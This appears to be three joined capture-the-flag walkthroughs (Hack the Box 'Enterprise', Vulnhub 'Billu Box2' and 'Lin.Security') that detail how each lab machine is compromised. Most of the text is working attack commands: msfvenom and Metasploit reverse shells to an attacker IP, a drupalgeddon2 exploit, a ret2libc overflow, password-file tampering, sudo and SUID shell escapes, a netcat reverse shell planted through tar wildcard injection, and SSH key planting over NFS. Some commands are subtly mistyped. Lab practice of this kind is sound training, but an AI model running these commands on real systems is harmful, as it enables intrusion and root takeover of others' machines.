Hack the Box Challenge: Enterprises Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Enterprise” which is available online for those who want to increase their skill in penetration testing and black box testing. Enterprise is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Expert

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.61 so let’s begin with nmap port enumeration.

nmap -sV 10.10.10.61

From given below image, you can observe we found port 22, 80, 443 and 80 are open on target system.

As port 80 is running http server we open the target machine’s ip address in our browser, and find a website that is running on wordpress.

As port 8080 is also running http server we open the target machine’s ip address in our browser, and find a website that is not made on wordpress.

When we try to open the wordpress admin page but are redirected to domain called “enterprise.htb”. We enter the domain name in /etc/hosts file.

Now when we open wp-admin, we are able to get the login page.

We run dirb on port 80 to enumerate the directories and find a directory called /files.

dirb http://10.10.10.61

We open the files/ directory, and find a zip file.

We download the zip file in our system and unzip it. After unzipping it we find 3 php files.

We take a look at the content of the files and it looks like there might be plugin called lcars that is being used by the wordpress site and by the looks of the code it is possible that is vulnerable to SQL-injection.

Now when we open it we get a php error message, we now know that this plugin is vulnerable to SQL-injection.

We use sqlmap to dump the database and found a message with a few passwords. We also find that there is a joomla database we try to dump it and find a username geordi.la.forge.

Now we use one of these passwords to login into wordpress. On the webpage we see that there are has been posts made by user william.riker. So we use credentials william.riker:u*Z14ru0p#ttj83zS6 to login into wordpress control panel.

Now we change the 404.php template with our payload to get reverse shell on the machine. First we are going to create our payload using msfvenom.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 –f raw

Now we are going to setup our listener using metasploit.

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 10.10.14.25

msf exploit(multi/handler) > set lport 4444

msf exploit(multi/handler) > run

After replacing the 404.php code with our payload, we open the 404.php page in our browser.

As soon as we open it we get our reverse shell.

After getting our reverse shell we find that we are actually in a container app and we find the machine has 2 network card.

Now we find all the ip’s in the subnet of the container.

Now we create another shell using msfvenom to upload it into the joomla site on port 8080.

Now we background our session and change the lport according to our payload.

meterpreter > background

msf exploit(multi/handler) > set lport 4455

msf exploit(multi/handler) > run

We are first going to login into the joomla site, using credentials, geordi.la.forge:ZD3YxfnSjezg67JZ and upload our shell code.

As soon as we open the page we get our reverse shell.

After getting into the joomla container, we find that we have common file called /var/www/html/files.

We create another php payload using msfvenom to upload this shell into /var/www/html/files directory.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 -f raw > shell1.php

We go to /var/www/html/files directory and upload the shell using meterpreter.

Now we background our current session and change the lport according to our new payload.

meterpreter > background

msf exploit(multi/handler) > set lport 5555

msf exploit(multi/handler) > run

When we go to /files directory we find that our shell has been uploaded.

As soon as we click on the payload we get our reverse shell.

After getting the reverse shell on the main machine instead of container we try to find files with suid bit set.

find / -perm -4000 2>/dev/null

We find a file called lcars, we find that it has been running on port 32812.

When we connect with it using netcat we find that it asks for access code.

We run the file on the target machine using ltrace to find the access code for this binary.

We find that when we pass a it gets compared to a string called pircarda1. We use this to login into the binary

We are able to access the file using this binary now we try to find this program is vulnerable to buffer overflow. We open the file using gdb to read the assembly code.

Now create 500 byte long string using pattern_create.rb script to find the EIP offset.

./pattern_create.rb -l 500

After searching all the options we find that option number 4 was vulnerable to buffer overflow.

We pass that into /usr/share/metasploit-framework/tools/pattern_offset.rb, we get an offset of 212. So we need to write 212 characters and then write the address of the instructions we want to be executed.

./pattern_offset -q 31684130 -l 500

Now when we try to insert shellcode into the buffer but we were unable to execute it because of DEP. It prevents code from being executed in the stack. Now we are going to do a ret2libc attack to execute a process already present in the process’ executable memory. We go into the target machine and find ASLR in enabled so we have to brute force the address. Now we find the address of system, exit and /bin/sh.

gdb /bin/lcars

(gdb) b main

(gdb) run

(gdb) p system

(gdb) find 0xf7e0bd10, +9999999, "/bin/sh"

(gdb) p exit

We create an exploit which can be found here. As soon as we run the exploit we get our reverse shell as root user. We go to /root directory and find a file called “root.txt”. When we open it we find our 1^st flag. We then go to /home directory inside we find another directory called jeanlucpicard/. Inside /home/jeanlucpicard we find a file called “user.txt”, we open it and find our final flag.

Hack the Billu Box2 VM (Boot to Root)

Hello freinds!! Today we are going to solve latest CTF challenge “Billu Box2” presented by vulnhub for penetration practice and design by Manish Kishan Tanwar. This virtual machine is having intermediate to medium difficulty level. One need to break into VM using web application and from there escalate privileges to gain root access.

You can download it from this Link: https://www.vulnhub.com/entry/billu-b0x-2,238/

Penetration Methodologies

§  Network scaning

§  Exploit Drupal (Metasploit)

§  privilege escalation via Writable /passwd file

§  Get root access and capture the flag

Let’s Begin!!

You will get target VM machine IP at the time of boot-up as you can observe we have it as 192.168.1.108.

So let’s start with nmap port enumeration and execute following command in our terminal.

nmap -A 192.168.1.108

Here I noticed drupal 8 CMS is running through apache and might be you are knowing that metasploit contains a module to compromise the target by exploiting drupalgeddon.

So let’s try to exploit this web application with the help of metasploit module and for that execute following command:

use exploit/unix/webapp/drupal_drupalgeddon2

msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.1.108

msf exploit(unix/webapp/drupal_drupalgeddon2)> exploit

Yippee!! We have owned meterpreter session 1, now let’s go for privilege escalation. Firstly let access proper tty shell with help of python one-liner and identify kernel version.

python -c 'import pty;pty.spawn("/bin/sh")'

lsb_release -a

I search for any relative kernel exploit but didn’t found any working exploit so I penetrated little bit more and enumerated that the /passwd file has ALL 777 permission as shown in the below image.

With help of cat command we open /etc/passwd file and notice an entry for local user “indishell” inside it. Since this file has ALL permission which mean I can modify it very easily. So I copied the whole /passwd file in an empty text file in our local machine and saved at /root/Desktop/passwd.

As you can observe the entry for user indishell contain encrypted passwd and I don’t know which encryption is used therefore I will try to replace the original salt password. We can use openssl command which will generate an encrypted password with salt.

openssl passwd -1 -salt abc pass123

Now copy it which is new salt password for password:pass123 and paste at the place of original salt password for user indishell.

As you can observe, we had manipulated old password hash from our new password salt and also modify UID GID as 0:0 to make him member of root user.

Now transfer your modified passwd file into target’s VM machine and follow below steps to access root shell terminal.

cd /etc

upload /root/Desktop/passwd

python -c 'import pty;pty.spawn("/bin/sh")'

su indishell

whoami

B000M!!!! We hit the Goal and got root access of this VM. This vulnerability can be exploit in multiple way and for detail open this link: http://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/

Second Method for Privilege Escalation

Search for the file having SUID or 4000 permission with help of Find command.

find / -perm -u=s -type f 2>/dev/null

Here I found SUID bit is enable for a file named as “s” which is present inside /opt directory, on its execution we realize that, it is an SCP file which is asking SSH authentication.

Hence, now we can modify this file to get bash shell with the help of following step which is also known Path Variable privilege Escalation.

cd /tmp

echo “/bin/sh” > scp

chmod 7777scp

export PATH=/tmp:$PATH

cd /opt

./s

id

This vulnerability can be exploit in multiple way and for detail open this link: http://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/

Hack the Lin.Security VM (Boot to Root)

As we know how some weak misconfiguration sudo rights can lead to root privilege escalation and today I am going to solve the CTF “Lin.Security – Vulnhub” which is design on weak sudo right permissions for beginners to test their skillset through this VM.

This lab has been designed by the researcher to help us understand, how certain built-in applications and services if misconfigured, may be abused by an attacker. Here an up-to-date Ubuntu distro (18.04 LTS) suffers from a number of vulnerabilities that allow a user to escalate to root on the box.

You can downloaad it from here: https://www.vulnhub.com/entry/linsecurity-1,244/

Task : Get root shell for ALL Users (Bob, Susan, Peter)

Level: Beginner to Advance

Penetrating Methodologies

Escalate root shell for Bob

·         Via sudo right

·         Via wildcard Injection

·         Via SUID Binaries

Escalate root shell for Susan

·         Via SUID Binaries

Escalate root shell for Peter

·         Via Network file sharing (NFS)

Note: Kindly follow the refernce link given in the article for details, because this machine vulnerbale to bunch of services and refrence link holds detail of each Privlege Escalation Techniques .

Escalate root shell for Bob

1^st Procedures

•                    Login using ssh credential

•                    Check sudoers list for sudo permissions

•                    Get root shell via system binaries having sudo permission  

Let’s move now to find the ways to root this lab!!

The first thing before doing any of the CTF is to read the instructions carefully before starting your vulnerability assessment and save your precious time.

The writer of the lab has given a hint in terms of user-id & password of one of the users.

It is “To get started you can log onto the host with the credentials: bob/secret“ and the IP of my lab is 192.168.1.104.

I used the port 22 (SSH) to login into the machine with given credentials: bob/secret

ssh bob@192.168.1.104

After ‘logging in’ I tried to check the sudo rights for user bob:

sudo -l

The next prompt asked for the root password and I tried the same credentials “secret” and it worked!! I can see all the permissions which bob has and now I can easily root the machine using any of these permitted commands.

Visit given below link for complete details:

https://gtfobins.github.io/

https://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights/

As you can observe that we had escalated root shell when sudo have rights for all types of shell such as ksh, zsh, bash and so on or for editors or for other programs such as pico, vi, perl, scp, find, less and so on. It goes in privileged environment with elevated privileges to access the file system or elevate root shell if sudo permission is enable.

You can use following list of command to get root shell:

sudo ash

sudo awk 'BEGIN {system("/bin/bash")}'

sudo bash

sudo sh

sudo csh

sudo dash

sudo tclsh

sudo zsh

find /home -exec /bin/bash \;

Get root shell via FTP, Expect, Socat

With this we can spawn the interactive system shell and can get away from low-privilege environments. It goes in privileged environment with elevated privileges to access the file system or elevate root shell if sudo permission is enable.

sudo ftp

!/bin/bash

id

exit

sudo expect

sudo env /bin/bash

sudo ed

!/bin/bash

id

exit

sudo perl -e 'exec' "/bin/bash";'

sudo socat exec:'bash -sh',pty,stderr,setsid,sigint,sane tcp:192.168.1.109:1234

On other you should be in listening mode by using socat listener in your local machine to get privilege shell:

socat file:`tty`,raw,echo=0 tcp-listen:1234

Less

With less we can spawn the interactive system shell and can get away from low-privilege environments. It goes in privileged environment with elevated privileges to access the file system or elevate root shell if sudo permission is enable.

sudo less /etc/hosts

As we know it opens the file in vi mode and since you have run command with sudo right which means we can get shell through it. Execute !bash command inside hosts file as shown above and you will get root shell.

Man

Man can be used to break out from restricted environments by spawning an interactive system shell.

sudo man /etc/hosts

As we know it opens the file in vi mode and since you have run command with sudo right which means we can get shell through it. Execute !bash command inside hosts file as shown above and you will get root shell.

Git

With this we can spawn the interactive system shell and can get away from low-privilege environments. It goes in privileged environment with elevated privileges to access the file system or elevate root shell if sudo permission is enable.

sudo git help status

As we know it opens the file in vi mode and since you have run command with sudo right which means we can get shell through it. Execute !bash command inside git status file as shown above and you will get root shell.

Pico

Since we know that pico is a text editor such as nano and vi also has sudo permission, which means that now we can also edit system files. Now open /etc/shadow file with pico editor and try to modify the root password.

On other hands I have generated a new encrypted password: pass123 using openssl passwd

openssl passwd -1 -salt abc pass123

Now paste the above generated encrypted password inside shadow file for user root.

Since we have modify the root password into pass123 therefore let get root login using it.

su root

SCP

It can be used to break out from restricted environments by spawning an interactive system shell. It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo.

hack=$(mktemp)

echo “/bin/bash 0<&2 1>&2” > $hack

chmod +x "$hack"

sudo scp -S $hack abc abd:

id

SSH

With this we can spawn the interactive system shell and can get away from low-privilege environments. It goes in privileged environment with elevated privileges to access the file system or elevate root shell if sudo permission is enable. Let’s spawn interactive root shell through Proxy Command option.

sudo ssh -o ProxyCommand=”;/bin/bash 0<&2 1>&2” abc

id

Curl

With this we can spawn the interactive system shell and can get away from low-privilege environments. Since we have low privilege shell which means, we can access /etc/passswd file.

               

So, I copied /etc/passwd file in my local machine and removed encrypted password for user “insecurity”.

By running curl with sudo permission we can fetch a remote file via http-get method.

So, as you can observe that now we are having modified passwd file where user insecurity has an entry with UID: GID 0:0 and no password.

Since we have modify the insurity password into blank password therefore let get root login using it.

sudo -u insecurity bash

Vi Editor

With this we can spawn the interactive system shell and can get away from low-privilege environments. It goes in privileged environment with elevated privileges to access the file system or elevate root shell if sudo permission is enable.

Type following:

sudo vi

:!sh

id

All you can observe that I have root shell after this.

Rvim

With rvim we can spawn the root shell and can get away from low-privilege environments. It goes in privileged environment with elevated privileges to access the file system or elevate root shell if sudo permission is enable. This requires that rvim is compiled with Python support. Prepend :py3 for Python 3. Now enter following command to spawn /bin/sh shell with higher privilege shell.

sudo rvim -c “:py3 import pty; pty.spwn(‘/bin/sh’)”

You will see, it opens the file in vi mode and since you have run command with sudo right which means we can get shell through it. Execute !bash command inside it as shown below and you will get root shell.

!bash

id

2^nd Procedures

•                    Wildcard Injection

•                    Check cron job

•                    Generate one-liner for netcat_reverse shell (msfvenom)

•                    Exploit tar wildcard injection

•                    Spawn root shell through netcat session

Now open crontab to view if any task is scheduled.

cat /etc/crontab

Here we notice the target has scheduled a bash program script for every 1 minute and we know that cron job runs as root. The minute attacker read the program written inside /etc/cron.daily/backup script, since it is saving a compressed copy of each user’s home directories to /etc/backups. Therefore we can apply tar wildcard injection.

Visit below link to read complete detail of wildcard injection attack: https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/

On a new terminal in your Kali to generate netcat reverse shell malicious code for achieving netcat reverse connection by using msfvenom and enter the following command for that:

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=8888 R

Now copy the generated payload and paste inside victim’s shell as described below.

echo "mkfifo /tmp/ckrkrjp; nc 192.168.1.109 8888 0

/tmp/ckrkrjp 2>&1; rm /tmp/ckrkrjp" > shell.sh

echo "" > "--checkpoint-action=exec=sh shell.sh"

echo "" > --checkpoint=1

Since the tar command is running as root due to crontab, this has the effect of spawning a netcat shell and sending it to the attack platform on port 8888. And if you go back to the terminal window where the listener was on, you will have victim’s reverse connection in after 1 minute.

nc -lvp 8888

id

3^rd Procedures

•                    Identify SUID binaries with find command

•                    Exploit SUID binary

find / -perm -u=s -type f 2>/dev/null

Here xxd and taskset are system binaries file having suid permissions and with this we can spawn the interactive system shell and can get away from low-privilege environments.

Visit below link to read complete detail of SUID Privilege Escalation:

https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/

It was quite easy to get root shell through taskset but fail to get privilege via xxd, although you can execute below command to get root shell.

taskset 1/bin/sh -p

Escalate root shell for Susan

Procedures:

•                    Identify SUID Binary with find command

•                    Exploiting SUID binary

•                    Read /etc/shadow through xxd

•                    Get root password

•                    Crack root password

•                    Get Root shell

Let’s get into /home directory where we discover 3 users’ directory bob, susan and peter. Since we have escalated root shell via bob in all possible way but now I’m curious in penetrating /susan directory. So while exploring /susan; I found password “MySuperS3cretValue!” from inside .secret

So we logged as Susan with the help of password we found inside .secret, next we need escalated root privilege because we are again in low privilege shell. As we knew xxd has suid permission therefore we try to escalated root privilege with following command

xxd is a Linux command that creates a hexdump of a given file when it has read permissions and as we know SUID bit is enable for xxd hence we can use it to read the information of /etc/shadow file.

xxd “/ect/shadow” | xxd -r

Once you have shadow file on your screen, copy the encrypted text for user root and crack it either with john the ripper or other resources.  So I have used online hash cracking tools and found the root password “secret123” and logged with it.

Escalate root shell for Peter

Procedures:

·         Exploiting NFS

·         Mount share directory

·         Create SSH pair key

·         Replace your pub_key to users’ authorized_keys

·         Get SSH login session for peter

·         Exploit Sudo right to get root shell

On scanning its network we found port 2049 is open for network share therefore we run showmount command to identify share directory

showmount -e 192.168.1.104

mkdir /tmp/raj

mount 192.168.1.104:/home/peter /tmp/raj

ls -al /tmp/raj

But I mount /home/peter in our /tmp/raj directory, I didn’t find anything here, truthfully when I try to create .ssh directory, it gave permission deny error therefore I create a fake peter account with an UID of 1001 on my Kali machine and successfully created .ssh folder as shown below steps.

groupadd -g 1005 peter

adduser peter -uid 1001 -gid 1005

su peter

sshkey-gen

cd /tmp/raj

mkdir .ssh

cat ~/.ssh/id_rsa.pub >> /tmp/raj/.ssh/authorized_keys

Now create SSH pair key and add your public SSH key to the users’ authorized_keys file and it allows you to log in as the target user, assuming that you have the appropriate private key.

Therefore follow below steps:

sshkey-gen

cd /tmp/raj

mkdir .ssh

cat ~/.ssh/id_rsa.pub >> /tmp/raj/.ssh/authorized_keys

ssh peter@192.168.1.104

Booomm!! Booomm!! We're logged in as Peter. There multiple way to exploit NFS services, it totally depends on situation. Visit the link below to learn more about NFS Privilege Escalation:

https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/

Now let’s check peter's sudo permission for user peter:

sudo -l

So, here peter can run strace commands with sudo which means we can spawn the interactive system shell and can get away from low-privilege environments. It goes in privileged environment with elevated privileges to access the file system or elevate root shell if sudo permission is enable

sudo strace -o /dev/null /bin/sh